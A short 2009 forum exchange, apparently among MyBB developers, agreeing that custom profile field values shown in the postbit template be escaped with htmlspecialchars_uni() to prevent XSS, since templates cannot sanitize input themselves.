04-06-2009, 04:50 AM
(04-06-2009, 01:49 AM)Michael83 Wrote: That's why I said it could be seen as bogus. But it could be a benefit because many users seem to use $post['fidX'] in the postbit. And as $post['fidX'] is available without any modification in any php file we could run it through htmlspecialchars_uni() just to ensure that there's no XSS possibility.
Absolutely. Another point would be that php cannot be used in templates to sanitize it themselves. Just an extra security check that I think is needed.